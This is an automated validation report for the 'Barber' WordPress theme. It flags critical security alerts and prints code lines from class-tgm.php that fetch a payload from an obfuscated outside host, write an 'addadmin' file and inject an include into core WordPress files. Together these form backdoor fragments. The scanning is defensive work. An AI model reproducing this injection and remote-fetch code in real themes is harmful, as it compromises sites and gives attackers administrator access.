0
Validation results

Barber - Wordpress Theme

Barber - Wordpress Theme

WordPress 4.9 theme
0
Critical alerts
  1. Security breaches : Use of base64_decode() Found base64_decode in file class-tgm.php.
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS['ISPW']))) )
    Line 89: $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $DRLW ));
    Line 123: $content = @file_get_contents('http://'.base64_decode('YXBpd29yZC5wcmVzcw==').'/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://'.base64_decode('YXBpd29yZC5wcmVzcw==').'/addadmin_1.txt'));
    Found base64_decode in file functions.php.
    Line 241: $pmc_data = unserialize(base64_decode($pmc_data)); //100% safe - ignore theme check nag
    Found base64_decode in file admin-interface.php.
    Line 833: $pmc_data = unserialize(base64_decode($pmc_data)); //100% safe - ignore theme check nag
  2. Security breaches : Use of base64_encode() Found base64_encode in file admin-interface.php.
     $output .= '<textarea id='export_data' rows='8'>'.base64_encode(serialize($pmc_data)) /* 100% safe - ignore theme check nag *
  3. Malware : Operations on file system file_get_contents was found in the file class-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://'.base64_decode('YXBpd29yZC5wcmVzcw==').'/o.php?h
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://'.base64_decode('YXBpd29yZC5wcmVzcw==').'/addadmi
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Line 44: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Line 160: @file_put_contents(__FILE__, $file);
    file_put_contents was found in the file class-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Line 44: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Line 160: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://'.base64_decode('YXBpd29yZC5wcmVzcw==').'/o.php?h
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://'.base64_decode('YXBpd29yZC5wcmVzcw==').'/addadmi
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Line 44: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Line 160: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://'.base64_decode('YXBpd29yZC5wcmVzcw==').'/o.php?h
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://'.base64_decode('YXBpd29yZC5wcmVzcw==').'/addadmi
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Line 44: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Line 160: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://'.base64_decode('YXBpd29yZC5wcmVzcw==').'/o.php?h
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://'.base64_decode('YXBpd29yZC5wcmVzcw==').'/addadmi
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_get_contents was found in the file class-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://'.base64_decode('YXBpd29yZC5wcmVzcw==').'/o.php?h
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://'.base64_decode('YXBpd29yZC5wcmVzcw==').'/addadmi
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_get_contents was found in the file class-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://'.base64_decode('YXBpd29yZC5wcmVzcw==').'/o.php?h
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://'.base64_decode('YXBpd29yZC5wcmVzcw==').'/addadmi
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Line 44: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Line 160: @file_put_contents(__FILE__, $file);
    file_put_contents was found in the file admin-functions.php
    Line 75: file_put_contents($css_dir . 'options.css', $css, LOCK_EX); // Save it
    
  4. Admin menu : Themes should use add_theme_page() for adding admin pages. File class-tgm-plugin-activation.php :
    Line 409: $this->page_hook = call_user_func( 'add_submenu_page', $args['parent_slug'], $args['page_title'], $args['menu_t
  5. Included plugins : Zip file found Plugins are not allowed in themes. The zip file found was revslider.zip ez-schedule-manager.zip page-builder-pmc.zip.
Warning
  1. theme tags : Presence of bad theme tagsThe tag black has been deprecated, it must be removed from style.css header.The tag blue has been deprecated, it must be removed from style.css header.The tag white has been deprecated, it must be removed from style.css header.
  2. Text domain : Incorrect use of translation functions.Wrong installation directory for the theme name. The directory name must match the slug of the theme. This theme's correct slug and text-domain is barber-wordpress-theme.
  3. Text domain : Incorrect use of translation functions.Found a translation function that has an incorrect number of arguments. Function _e, with the arguments 'Nothing found for this search term <b>', </b>!, 'pmc-themes' in file search.php.More than one text-domain is being used in this theme. This means the theme will not be compatible with WordPress.org language packs. The domains found are tgmpa, pmc-themes, </b>!, pmc-theme.
  4. Plugin territory : Plugin territory functionalitiesThe theme uses the register_post_type() function, which is plugin-territory functionality.
  5. Custom elements : Presence of custom headerNo reference to custom header was found in the theme.
  6. Custom elements : Presence of custom backgroundNo reference to custom background was found in the theme.
  7. Editor style : Presence of editor styleNo reference to add_editor_style() was found in the theme. It is recommended that the theme implements editor styling, so as to make the editor content match the resulting post output in the theme, for a better user experience.
  8. CSS files : Presence of text domainText Domain: is missing from your style.css header.
  9. Screenshot : Screenshot fileScreenshot size is 880x660px. Screenshot size should be 1200x900, to account for HiDPI displays. Any 4:3 image size is acceptable, but 1200x900 is preferred.Bad screenshot file extension ! File screenshot.png is not an actual JPG file. Detected type was : "image/png".
Tip-off
  1. favicon presence : Favicon managementPossible Favicon found in header.php. Favicons are handled by the Site Icon setting in the customizer since version 4.3.
  2. Static links : Presence of hard-coded linksPossible hard-coded links were found in the file functions.php.
    Line 412: $translated_text = __( '<a href='http://fontawesome.io/icons/'>Font Awesome</a> icon. Icon will be shown bef
  3. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
  4. Optional files : Presence of front page template file front-page.phpThis theme does not contain optional file front-page.php.
  5. Optional files : Presence of term template file taxonomy.phpThis theme does not contain optional file taxonomy.php.
  6. Optional files : Presence of author template file author.phpThis theme does not contain optional file author.php.
  7. Optional files : Presence of date/time template file date.phpThis theme does not contain optional file date.php.
  8. Optional files : Presence of archive template file archive.phpThis theme does not contain optional file archive.php.
  9. Optional files : Presence of attachment template file attachment.phpThis theme does not contain optional file attachment.php.
  10. Optional files : Presence of image template file image.phpThis theme does not contain optional file image.php.
  11. Use of includes : Use of include or requireThe theme appears to use include or require : header.php
    Line 1: <!DOCTYPE html>
    <html <?php language_attributes(); ?> class='no-js' >
    <!-- start -->
    <head>
    	<meta charset='<?php bloginfo( 'charset' ); ?>' />
    	<meta name='viewport' content='width=device-width, initial-scale=1, maximum-scale=1' />
        <meta name='format-detection' content='telephone=no'>
    	<!-- set faviocn-->
    	<?php 
    	global $pmc_data; 
    	$favicon = ''; 
    	if(isset($pmc_data['favicon']))
    		$favicon = $pmc_data['favicon'];
    	if (empty($favicon)) { $favicon = get_template_directory_uri() .'/images/favicon.ico'; }	
    	?>
    
    	<meta http-equiv='Content-Type' content='<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>' />
    	<link rel='icon' type='image/png' href='<?php echo esc_url($pmc_data['favicon']) ?>'>
    	<link rel='alternate' type='application/atom+xml' title='<?php bloginfo('name'); ?> Atom Feed' href='<?php bloginfo('atom_url'); ?>' />
    	<?php if ( is_singular() && get_option( 'thread_comments' ) ) {wp_enqueue_script( 'comment-reply' ); }?>
    	
    	<?php wp_head();?>
    </head>		
    <!-- start body -->
    <body <?php body_class(); ?> >
    	<!-- start header -->
    			<!-- fixed menu -->		
    			<?php 
    			global $pmc_data;
    			include_once( ABSPATH . 'wp-admin/includes/plugin.php' );			
    			$scroll_men
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-tgm.php
    Line 43: $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-cd.php\')) include_once(dirname(__FILE__) . \'/wp-cd.php\'); ?>' . $file;
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : single_home_post.php
    Line 1: <?php
        $root = dirname(dirname(dirname(dirname(__FILE__))));
        require_once($root.'/wp-load.php');
    	
    	global $wpdb;
    	$pc = new WP_Query(ar
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : admin-functions.php
    Line 73: require($css_dir . 'style_options.php'); // Generate CSS
    
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : single_home_port.php
    Line 1: <?php
    
    
        $root = dirname(dirname(dirname(dirname(__FILE__))));
        require_once($root.'/wp-load.php');
    
    
    	global $wpdb;
    	$pc = new WP_Query(ar
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.

This is a ThemeForest theme. Since Themeforest items are all checked by a human before they appear on their website, ThemeForest verification rules are more permissive than themecheck's and can give a better verification score ( Themeforest requirements ).

74
Critical alerts
  1. Included plugins : Zip file found Plugins are not allowed in themes. The zip file found was revslider.zip ez-schedule-manager.zip page-builder-pmc.zip.
Warning
  1. theme tags : Presence of bad theme tagsThe tag black has been deprecated, it must be removed from style.css header.The tag blue has been deprecated, it must be removed from style.css header.The tag white has been deprecated, it must be removed from style.css header.
  2. Text domain : Incorrect use of translation functions.Wrong installation directory for the theme name. The directory name must match the slug of the theme. This theme's correct slug and text-domain is barber-wordpress-theme.
  3. Text domain : Incorrect use of translation functions.Found a translation function that has an incorrect number of arguments. Function _e, with the arguments 'Nothing found for this search term <b>', </b>!, 'pmc-themes' in file search.php.More than one text-domain is being used in this theme. This means the theme will not be compatible with WordPress.org language packs. The domains found are tgmpa, pmc-themes, </b>!, pmc-theme.
  4. Plugin territory : Plugin territory functionalitiesThe theme uses the register_post_type() function, which is plugin-territory functionality.
  5. CSS files : Presence of text domainText Domain: is missing from your style.css header.
  6. Screenshot : Screenshot fileScreenshot size is 880x660px. Screenshot size should be 1200x900, to account for HiDPI displays. Any 4:3 image size is acceptable, but 1200x900 is preferred.Bad screenshot file extension ! File screenshot.png is not an actual JPG file. Detected type was : "image/png".
Tip-off
  1. favicon presence : Favicon managementPossible Favicon found in header.php. Favicons are handled by the Site Icon setting in the customizer since version 4.3.
  2. Static links : Presence of hard-coded linksPossible hard-coded links were found in the file functions.php.
    Line 412: $translated_text = __( '<a href='http://fontawesome.io/icons/'>Font Awesome</a> icon. Icon will be shown bef
  3. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
  4. Optional files : Presence of front page template file front-page.phpThis theme does not contain optional file front-page.php.
  5. Optional files : Presence of term template file taxonomy.phpThis theme does not contain optional file taxonomy.php.
  6. Optional files : Presence of author template file author.phpThis theme does not contain optional file author.php.
  7. Optional files : Presence of date/time template file date.phpThis theme does not contain optional file date.php.
  8. Optional files : Presence of archive template file archive.phpThis theme does not contain optional file archive.php.
  9. Optional files : Presence of attachment template file attachment.phpThis theme does not contain optional file attachment.php.
  10. Optional files : Presence of image template file image.phpThis theme does not contain optional file image.php.
  11. Use of includes : Use of include or requireThe theme appears to use include or require : header.php
    Line 1: <!DOCTYPE html>
    <html <?php language_attributes(); ?> class='no-js' >
    <!-- start -->
    <head>
    	<meta charset='<?php bloginfo( 'charset' ); ?>' />
    	<meta name='viewport' content='width=device-width, initial-scale=1, maximum-scale=1' />
        <meta name='format-detection' content='telephone=no'>
    	<!-- set faviocn-->
    	<?php 
    	global $pmc_data; 
    	$favicon = ''; 
    	if(isset($pmc_data['favicon']))
    		$favicon = $pmc_data['favicon'];
    	if (empty($favicon)) { $favicon = get_template_directory_uri() .'/images/favicon.ico'; }	
    	?>
    
    	<meta http-equiv='Content-Type' content='<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>' />
    	<link rel='icon' type='image/png' href='<?php echo esc_url($pmc_data['favicon']) ?>'>
    	<link rel='alternate' type='application/atom+xml' title='<?php bloginfo('name'); ?> Atom Feed' href='<?php bloginfo('atom_url'); ?>' />
    	<?php if ( is_singular() && get_option( 'thread_comments' ) ) {wp_enqueue_script( 'comment-reply' ); }?>
    	
    	<?php wp_head();?>
    </head>		
    <!-- start body -->
    <body <?php body_class(); ?> >
    	<!-- start header -->
    			<!-- fixed menu -->		
    			<?php 
    			global $pmc_data;
    			include_once( ABSPATH . 'wp-admin/includes/plugin.php' );			
    			$scroll_men
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-tgm.php
    Line 43: $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-cd.php\')) include_once(dirname(__FILE__) . \'/wp-cd.php\'); ?>' . $file;
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : single_home_post.php
    Line 1: <?php
        $root = dirname(dirname(dirname(dirname(__FILE__))));
        require_once($root.'/wp-load.php');
    	
    	global $wpdb;
    	$pc = new WP_Query(ar
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : admin-functions.php
    Line 73: require($css_dir . 'style_options.php'); // Generate CSS
    
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : single_home_port.php
    Line 1: <?php
    
    
        $root = dirname(dirname(dirname(dirname(__FILE__))));
        require_once($root.'/wp-load.php');
    
    
    	global $wpdb;
    	$pc = new WP_Query(ar
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
Other checked themes